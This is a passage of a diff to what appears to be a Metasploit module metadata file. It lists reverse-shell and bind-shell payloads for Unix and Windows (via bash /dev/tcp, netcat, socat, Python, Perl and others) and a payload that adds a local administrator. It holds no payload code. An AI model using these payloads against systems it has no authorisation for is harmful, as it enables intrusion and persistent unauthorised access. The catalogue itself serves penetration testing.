Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_tcp_ssl": { - "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/unix/python/shell_reverse_udp": { - "name": "Python Exec, Command Shell, Reverse UDP (via python)", - "fullname": "payload/cmd/unix/python/shell_reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/adapters/cmd/unix/python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/python/shell_reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/unix/python", - "adapted_refname": "python/shell_reverse_udp", - "staged": false - }, - "payload_cmd/unix/reverse": { - "name": "Unix Command Shell, Double Reverse TCP (telnet)", - "fullname": "payload/cmd/unix/reverse", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell through two inbound connections", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_awk": { - "name": "Unix Command Shell, Reverse TCP (via AWK)", - "fullname": "payload/cmd/unix/reverse_awk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "espreto ", - "Ulisses Castro ", - "Gabriel Quadros " - ], - "description": "Creates an interactive shell via GNU AWK", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_awk.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_awk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_bash": { - "name": "Unix Command Shell, Reverse TCP (/dev/tcp)", - "fullname": "payload/cmd/unix/reverse_bash", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell via bash's builtin /dev/tcp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/tcp feature.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_bash", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_bash_telnet_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (telnet)", - "fullname": "payload/cmd/unix/reverse_bash_telnet_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via mkfifo and telnet.\n This method works on Debian and other systems compiled\n without /dev/tcp support. 
This module uses the '-z'\n option included on some systems to encrypt using SSL.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_bash_telnet_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_bash_udp": { - "name": "Unix Command Shell, Reverse UDP (/dev/udp)", - "fullname": "payload/cmd/unix/reverse_bash_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "bcoles " - ], - "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/udp feature.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_bash_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_jjs": { - "name": "Unix Command Shell, Reverse TCP (via jjs)", - "fullname": "payload/cmd/unix/reverse_jjs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "conerpirate", - "bcoles " - ], - "description": "Connect back and create a command shell via jjs", - "references": [ - 
"URL-https://gtfobins.github.io/gtfobins/jjs/", - "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", - "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" - ], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_jjs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ksh": { - "name": "Unix Command Shell, Reverse TCP (via Ksh)", - "fullname": "payload/cmd/unix/reverse_ksh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Wang Yihang " - ], - "description": "Connect back and create a command shell via Ksh. 
Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ksh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_lua": { - "name": "Unix Command Shell, Reverse TCP (via Lua)", - "fullname": "payload/cmd/unix/reverse_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Creates an interactive shell via Lua", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ncat_ssl": { - "name": "Unix Command Shell, Reverse TCP (via ncat)", - "fullname": "payload/cmd/unix/reverse_ncat_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "C_Sto" - ], - "description": "Creates an interactive shell via ncat, utilizing ssl mode", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
"/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ncat_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_netcat": { - "name": "Unix Command Shell, Reverse TCP (via netcat)", - "fullname": "payload/cmd/unix/reverse_netcat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "m-1-k-3", - "egypt ", - "juan vazquez " - ], - "description": "Creates an interactive shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_netcat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_netcat_gaping": { - "name": "Unix Command Shell, Reverse TCP (via netcat -e)", - "fullname": "payload/cmd/unix/reverse_netcat_gaping", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_netcat_gaping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_nodejs": { - "name": "Unix Command Shell, Reverse TCP (via nodejs)", - "fullname": "payload/cmd/unix/reverse_nodejs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Continually listen for a connection and spawn a command shell via nodejs", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_nodejs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_nodejs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_openssl": { - "name": "Unix Command Shell, Double Reverse TCP SSL (openssl)", - "fullname": "payload/cmd/unix/reverse_openssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell through two inbound connections", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_openssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_perl": { - "name": "Unix Command Shell, Reverse TCP (via Perl)", - "fullname": "payload/cmd/unix/reverse_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"cazz " - ], - "description": "Creates an interactive shell via perl", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_perl_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via perl)", - "fullname": "payload/cmd/unix/reverse_perl_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via perl, uses SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_perl_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_php_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via php)", - "fullname": "payload/cmd/unix/reverse_php_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via php, uses SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 20:39:52 +0000", - "path": 
"/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_php_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_python": { - "name": "Unix Command Shell, Reverse TCP (via Python)", - "fullname": "payload/cmd/unix/reverse_python", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - "description": "Connect back and create a command shell via Python", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_python", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_python_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/cmd/unix/reverse_python_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_python_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, 
- "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_r": { - "name": "Unix Command Shell, Reverse TCP (via R)", - "fullname": "payload/cmd/unix/reverse_r", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and create a command shell via R", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_r", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ruby": { - "name": "Unix Command Shell, Reverse TCP (via Ruby)", - "fullname": "payload/cmd/unix/reverse_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Connect back and create a command shell via Ruby", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ruby_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via Ruby)", - "fullname": "payload/cmd/unix/reverse_ruby_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and 
create a command shell via Ruby, uses SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ruby_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_socat_sctp": { - "name": "Unix Command Shell, Reverse SCTP (via socat)", - "fullname": "payload/cmd/unix/reverse_socat_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-04-27 16:21:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_socat_sctp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_socat_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_socat_tcp": { - "name": "Unix Command Shell, Reverse TCP (via socat)", - "fullname": "payload/cmd/unix/reverse_socat_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jheysel-r7" - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-09-06 15:52:56 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_socat_tcp.rb", 
- "is_install_path": true, - "ref_name": "cmd/unix/reverse_socat_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_socat_udp": { - "name": "Unix Command Shell, Reverse UDP (via socat)", - "fullname": "payload/cmd/unix/reverse_socat_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_socat_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ssh": { - "name": "Unix Command Shell, Reverse TCP SSH", - "fullname": "payload/cmd/unix/reverse_ssh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan ", - "hirura" - ], - "description": "Connect back and create a command shell via SSH", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ssh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ssl_double_telnet": { - "name": "Unix 
Command Shell, Double Reverse TCP SSL (telnet)", - "fullname": "payload/cmd/unix/reverse_ssl_double_telnet", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "RageLtMan " - ], - "description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ssl_double_telnet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_stub": { - "name": "Unix Command Shell, Reverse TCP (stub)", - "fullname": "payload/cmd/unix/reverse_stub", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell through an inbound connection (stub only, no payload)", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_stub.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_stub", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_tclsh": { - "name": "Unix Command Shell, Reverse TCP (via Tclsh)", - "fullname": "payload/cmd/unix/reverse_tclsh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - 
"description": "Creates an interactive shell via Tclsh", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-22 05:49:48 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_tclsh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_tclsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_zsh": { - "name": "Unix Command Shell, Reverse TCP (via Zsh)", - "fullname": "payload/cmd/unix/reverse_zsh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Doug Prostko ", - "Wang Yihang " - ], - "description": "Connect back and create a command shell via Zsh. Note: Although Zsh is often\n available, please be aware it isn't usually installed by default.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_zsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/adduser": { - "name": "Windows Execute net user /ADD CMD", - "fullname": "payload/cmd/windows/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "scriptjunkie", - "Chris John Riley" - ], - "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n 
for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/adduser.rb", - "is_install_path": true, - "ref_name": "cmd/windows/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_lua": { - "name": "Windows Command Shell, Bind TCP (via Lua)", - "fullname": "payload/cmd/windows/bind_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Listen for a connection and spawn a command shell via Lua", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_perl": { - "name": "Windows Command Shell, Bind TCP (via Perl)", - "fullname": "payload/cmd/windows/bind_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz ", - "aushack " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_perl_ipv6": { - "name": "Windows Command Shell, Bind TCP (via perl) IPv6", - "fullname": "payload/cmd/windows/bind_perl_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz ", - "aushack " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_perl_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_ruby": { - "name": "Windows Command Shell, Bind TCP (via Ruby)", - "fullname": "payload/cmd/windows/bind_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - 
